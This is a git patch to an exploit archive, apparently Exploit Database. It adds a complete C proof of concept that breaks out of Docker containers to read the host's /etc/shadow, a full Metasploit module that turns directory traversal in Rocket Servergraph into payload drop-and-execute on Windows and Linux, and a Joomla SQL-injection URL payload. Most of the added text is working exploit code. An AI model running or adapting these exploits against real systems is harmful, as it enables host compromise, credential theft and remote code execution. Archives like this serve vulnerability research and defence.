From c6e45583e6ef6470f6a87861a8648e983aa2b675 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 20 Jun 2014 04:38:01 +0000 Subject: [PATCH] Updated 06_20_2014 --- files.csv | 8 +- platforms/linux/local/33808.c | 188 +++++++++++ platforms/multiple/remote/33807.rb | 348 +++++++++++++++++++++ platforms/osx/remote/33810.html | 9 + platforms/osx/remote/33811.html | 9 + platforms/php/webapps/33812.txt | 7 + platforms/php/webapps/33813.html | 9 + platforms/windows/{remote => dos}/33804.pl | 0 8 files changed, 577 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/local/33808.c create mode 100755 platforms/multiple/remote/33807.rb create mode 100755 platforms/osx/remote/33810.html create mode 100755 platforms/osx/remote/33811.html create mode 100755 platforms/php/webapps/33812.txt create mode 100755 platforms/php/webapps/33813.html rename platforms/windows/{remote => dos}/33804.pl (100%) diff --git a/files.csv b/files.csv index 0f22be64f..4416f5e7a 100755 --- a/files.csv +++ b/files.csv @@ -30453,4 +30453,10 @@ id,file,description,date,author,platform,type,port 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/Seamonkey CVE-2010-0167 Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0 -33804,platforms/windows/remote/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,remote,0 +33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0 +33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888 +33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 +33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 +33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0 +33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0 diff --git a/platforms/linux/local/33808.c b/platforms/linux/local/33808.c new file mode 100755 index 000000000..59c57da8f --- /dev/null +++ b/platforms/linux/local/33808.c @@ -0,0 +1,188 @@ +/* shocker: docker PoC VMM-container breakout (C) 2014 Sebastian Krahmer + * + * Demonstrates that any given docker image someone is asking + * you to run in your docker setup can access ANY file on your host, + * e.g. dumping hosts /etc/shadow or other sensitive info, compromising + * security of the host and any other docker VM's on it. + * + * docker using container based VMM: Sebarate pid and net namespace, + * stripped caps and RO bind mounts into container's /. However + * as its only a bind-mount the fs struct from the task is shared + * with the host which allows to open files by file handles + * (open_by_handle_at()). As we thankfully have dac_override and + * dac_read_search we can do this. The handle is usually a 64bit + * string with 32bit inodenumber inside (tested with ext4). + * Inode of / is always 2, so we have a starting point to walk + * the FS path and brute force the remaining 32bit until we find the + * desired file (It's probably easier, depending on the fhandle export + * function used for the FS in question: it could be a parent inode# or + * the inode generation which can be obtained via an ioctl). + * [In practise the remaining 32bit are all 0 :] + * + * tested with docker 0.11 busybox demo image on a 3.11 kernel: + * + * docker run -i busybox sh + * + * seems to run any program inside VMM with UID 0 (some caps stripped); if + * user argument is given, the provided docker image still + * could contain +s binaries, just as demo busybox image does. + * + * PS: You should also seccomp kexec() syscall :) + * PPS: Might affect other container based compartments too + * + * $ cc -Wall -std=c99 -O2 shocker.c -static + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +struct my_file_handle { + unsigned int handle_bytes; + int handle_type; + unsigned char f_handle[8]; +}; + + + +void die(const char *msg) +{ + perror(msg); + exit(errno); +} + + +void dump_handle(const struct my_file_handle *h) +{ + fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, + h->handle_type); + for (int i = 0; i < h->handle_bytes; ++i) { + fprintf(stderr,"0x%02x", h->f_handle[i]); + if ((i + 1) % 20 == 0) + fprintf(stderr,"\n"); + if (i < h->handle_bytes - 1) + fprintf(stderr,", "); + } + fprintf(stderr,"};\n"); +} + + +int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) +{ + int fd; + uint32_t ino = 0; + struct my_file_handle outh = { + .handle_bytes = 8, + .handle_type = 1 + }; + DIR *dir = NULL; + struct dirent *de = NULL; + + path = strchr(path, '/'); + + // recursion stops if path has been resolved + if (!path) { + memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); + oh->handle_type = 1; + oh->handle_bytes = 8; + return 1; + } + ++path; + fprintf(stderr, "[*] Resolving '%s'\n", path); + + if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) + die("[-] open_by_handle_at"); + + if ((dir = fdopendir(fd)) == NULL) + die("[-] fdopendir"); + + for (;;) { + de = readdir(dir); + if (!de) + break; + fprintf(stderr, "[*] Found %s\n", de->d_name); + if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { + fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); + ino = de->d_ino; + break; + } + } + + fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); + + + if (de) { + for (uint32_t i = 0; i < 0xffffffff; ++i) { + outh.handle_bytes = 8; + outh.handle_type = 1; + memcpy(outh.f_handle, &ino, sizeof(ino)); + memcpy(outh.f_handle + 4, &i, sizeof(i)); + + if ((i % (1<<20)) == 0) + fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); + if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { + closedir(dir); + close(fd); + dump_handle(&outh); + return find_handle(bfd, path, &outh, oh); + } + } + } + + closedir(dir); + close(fd); + return 0; +} + + +int main() +{ + char buf[0x1000]; + int fd1, fd2; + struct my_file_handle h; + struct my_file_handle root_h = { + .handle_bytes = 8, + .handle_type = 1, + .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} + }; + + fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" + "[***] The tea from the 90's kicks your sekurity again. [***]\n" + "[***] If you have pending sec consulting, I'll happily [***]\n" + "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + + read(0, buf, 1); + + // get a FS reference from something mounted in from outside + if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0) + die("[-] open"); + + if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0) + die("[-] Cannot find valid handle!"); + + fprintf(stderr, "[!] Got a final handle!\n"); + dump_handle(&h); + + if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) + die("[-] open_by_handle"); + + memset(buf, 0, sizeof(buf)); + if (read(fd2, buf, sizeof(buf) - 1) < 0) + die("[-] read"); + + fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf); + + close(fd2); close(fd1); + + return 0; +} + diff --git a/platforms/multiple/remote/33807.rb b/platforms/multiple/remote/33807.rb new file mode 100755 index 000000000..9f21b600b --- /dev/null +++ b/platforms/multiple/remote/33807.rb @@ -0,0 +1,348 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Rocket Servergraph Admin Center fileRequestor Remote Code Execution', + 'Description' => %q{ + This module abuses several directory traversal flaws in Rocket Servergraph Admin + Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet, + allowing a remote attacker to write arbitrary files and execute commands with + administrative privileges. This module has been tested successfully on Rocket + ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu + 12.04 64 bits. + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3914'], + ['ZDI', '14-161'], + ['ZDI', '14-162'], + ['BID', '67779'] + ], + 'Privileged' => true, + 'Platform' => %w{ linux unix win }, + 'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_CMD], + 'Payload' => + { + 'Space' => 8192, # it's writing a file, so just a long enough value + 'DisableNops' => true + #'BadChars' => (0x80..0xff).to_a.pack("C*") # Doesn't apply + }, + 'Targets' => + [ + [ 'Linux (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86 + } + ], + [ 'Linux (CMD Payload)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + } + ], + [ 'Windows / VB Script', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ], + [ 'Windows CMD', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 30 2013')) + + register_options( + [ + Opt::RPORT(8888) + ], self.class) + + register_advanced_options( + [ + OptInt.new('TRAVERSAL_DEPTH', [ true, 'Traversal depth to hit the root folder', 20]), + OptString.new("WINDIR", [ true, 'The Windows Directory name', 'WINDOWS' ]), + OptString.new("TEMP_DIR", [ false, 'A directory where we can write files' ]) + ], self.class) + + end + + def check + os = get_os + + if os.nil? + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Appears + end + + def exploit + os = get_os + + if os == 'win' && target.name =~ /Linux/ + fail_with(Failure::BadConfig, "#{peer} - Windows system detected, but Linux target selected") + elsif os == 'linux' && target.name =~ /Windows/ + fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") + elsif os.nil? + print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + end + + if target.name =~ /Windows.*VB/ + exploit_windows_vbs + elsif target.name =~ /Windows.*CMD/ + exploit_windows_cmd + elsif target.name =~ /Linux.*CMD/ + exploit_linux_cmd + elsif target.name =~ /Linux.*Native/ + exploit_linux_native + end + end + + def exploit_windows_vbs + traversal = "\\.." * traversal_depth + payload_base64 = Rex::Text.encode_base64(generate_payload_exe) + temp = temp_dir('win') + decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.vbs" + encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" + exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" + + print_status("#{peer} - Dropping the encoded payload to filesystem...") + write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) + + vbs = generate_decoder_vbs({ + :temp_dir => "C:#{temp}", + :encoded_file_name => encoded_file_name, + :exe_file_name => exe_file_name + }) + print_status("#{peer} - Dropping the VBS decoder to filesystem...") + write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) + + register_files_for_cleanup("C:#{temp}#{decoder_file_name}") + register_files_for_cleanup("C:#{temp}#{encoded_file_name}") + register_files_for_cleanup("C:#{temp}#{exe_file_name}") + print_status("#{peer} - Executing payload...") + execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") + end + + + def exploit_windows_cmd + traversal = "\\.." * traversal_depth + execute("#{traversal}\\#{win_dir}\\System32\\cmd.exe /B /C #{payload.encoded}") + end + + def exploit_linux_native + traversal = "/.." * traversal_depth + payload_base64 = Rex::Text.encode_base64(generate_payload_exe) + temp = temp_dir('linux') + encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" + decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" + elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" + + print_status("#{peer} - Dropping the encoded payload to filesystem...") + write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) + + decoder = <<-SH +#!/bin/sh + +base64 --decode #{temp}#{encoded_file_name} > #{temp}#{elf_file_name} +chmod 777 #{temp}#{elf_file_name} +#{temp}#{elf_file_name} +SH + + print_status("#{peer} - Dropping the decoder to filesystem...") + write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) + + register_files_for_cleanup("#{temp}#{decoder_file_name}") + register_files_for_cleanup("#{temp}#{encoded_file_name}") + register_files_for_cleanup("#{temp}#{elf_file_name}") + + print_status("#{peer} - Giving execution permissions to the decoder...") + execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") + + print_status("#{peer} - Executing decoder and payload...") + execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") + end + + def exploit_linux_cmd + temp = temp_dir('linux') + elf = rand_text_alpha(4 + rand(4)) + + traversal = "/.." * traversal_depth + print_status("#{peer} - Dropping payload...") + write_file("#{traversal}#{temp}#{elf}", payload.encoded) + register_files_for_cleanup("#{temp}#{elf}") + print_status("#{peer} - Providing execution permissions...") + execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") + print_status("#{peer} - Executing payload...") + execute("#{traversal}#{temp}#{elf}") + end + + def generate_decoder_vbs(opts = {}) + decoder_path = File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64") + + f = File.new(decoder_path, "rb") + decoder = f.read(f.stat.size) + f.close + + decoder.gsub!(/>>decode_stub/, "") + decoder.gsub!(/^echo /, "") + decoder.gsub!(/ENCODED/, "#{opts[:temp_dir]}#{opts[:encoded_file_name]}") + decoder.gsub!(/DECODED/, "#{opts[:temp_dir]}#{opts[:exe_file_name]}") + + decoder + end + + def get_os + os = nil + path = "" + hint = rand_text_alpha(3 + rand(4)) + + res = send_request(20, "writeDataFile", rand_text_alpha(4 + rand(10)), "/#{hint}/#{hint}") + + if res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\/#{hint}\/#{hint} \(No such file or directory\)/ + path = $1 + elsif res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\\#{hint}\\#{hint} \(The system cannot find the path specified\)/ + path = $1 + end + + if path =~ /^\// + os = 'linux' + elsif path =~ /^[a-zA-Z]:\\/ + os = 'win' + end + + os + end + + def temp_dir(os) + temp = "" + case os + when 'linux' + temp = linux_temp_dir + when 'win' + temp = win_temp_dir + end + + temp + end + + def linux_temp_dir + dir = "/tmp/" + + if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty? + dir = datastore['TEMP_DIR'] + end + + unless dir.start_with?("/") + dir = "/#{dir}" + end + + unless dir.end_with?("/") + dir = "#{dir}/" + end + + dir + end + + def win_temp_dir + dir = "\\#{win_dir}\\Temp\\" + + if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty? + dir = datastore['TEMP_DIR'] + end + + dir.gsub!(/\//, "\\") + dir.gsub!(/^([A-Za-z]:)?/, "") + + unless dir.start_with?("\\") + dir = "\\#{dir}" + end + + unless dir.end_with?("\\") + dir = "#{dir}\\" + end + + dir + end + + def win_dir + dir = "WINDOWS" + if datastore['WINDIR'] + dir = datastore['WINDIR'] + dir.gsub!(/\//, "\\") + dir.gsub!(/[\\]*$/, "") + dir.gsub!(/^([A-Za-z]:)?[\\]*/, "") + end + + dir + end + + def traversal_depth + depth = 20 + + if datastore['TRAVERSAL_DEPTH'] && datastore['TRAVERSAL_DEPTH'] > 1 + depth = datastore['TRAVERSAL_DEPTH'] + end + + depth + end + + def write_file(file_name, contents) + res = send_request(20, "writeDataFile", Rex::Text.uri_encode(contents), file_name) + + unless res && res.code == 200 && res.body.to_s =~ /Data successfully writen to file: / + fail_with(Failure::Unknown, "#{peer} - Failed to write file... aborting") + end + + res + end + + def execute(command) + res = send_request(1, "run", command) + + res + end + + def send_request(timeout, command, query, source = rand_text_alpha(rand(4) + 4)) + data = "&invoker=#{rand_text_alpha(rand(4) + 4)}" + data << "&title=#{rand_text_alpha(rand(4) + 4)}" + data << "¶ms=#{rand_text_alpha(rand(4) + 4)}" + data << "&id=#{rand_text_alpha(rand(4) + 4)}" + data << "&cmd=#{command}" + data << "&source=#{source}" + data << "&query=#{query}" + + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'SGPAdmin', 'fileRequest'), + 'method' => 'POST', + 'data' => data + }, timeout) + + res + end + +end \ No newline at end of file diff --git a/platforms/osx/remote/33810.html b/platforms/osx/remote/33810.html new file mode 100755 index 000000000..578ab7146 --- /dev/null +++ b/platforms/osx/remote/33810.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38992/info + +Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability. + +Successful exploits can allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. + +Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected. + + Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch

Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch

(C) Nishant Das Patnaik

\ No newline at end of file diff --git a/platforms/osx/remote/33811.html b/platforms/osx/remote/33811.html new file mode 100755 index 000000000..cff9b1f40 --- /dev/null +++ b/platforms/osx/remote/33811.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38994/info + +Apple Safari running on iPhone and iPod touch is prone to a remote code-execution vulnerability. + +Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. + +Safari on Apple iPhone and iPod touch 3.1.3 and prior are vulnerable. + +

Remote DoS on Safari for iPhone & iPod Touch

(C) Nishant Das Patnaik

\ No newline at end of file diff --git a/platforms/php/webapps/33812.txt b/platforms/php/webapps/33812.txt new file mode 100755 index 000000000..bf81df328 --- /dev/null +++ b/platforms/php/webapps/33812.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39032/info + +The 'com_weblinks' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 \ No newline at end of file diff --git a/platforms/php/webapps/33813.html b/platforms/php/webapps/33813.html new file mode 100755 index 000000000..3a14e8aca --- /dev/null +++ b/platforms/php/webapps/33813.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39038/info + +Fuctweb CapCC Plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CapCC 1.0 is affected; other versions may also be vulnerable. + + CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua
\ No newline at end of file diff --git a/platforms/windows/remote/33804.pl b/platforms/windows/dos/33804.pl similarity index 100% rename from platforms/windows/remote/33804.pl rename to platforms/windows/dos/33804.pl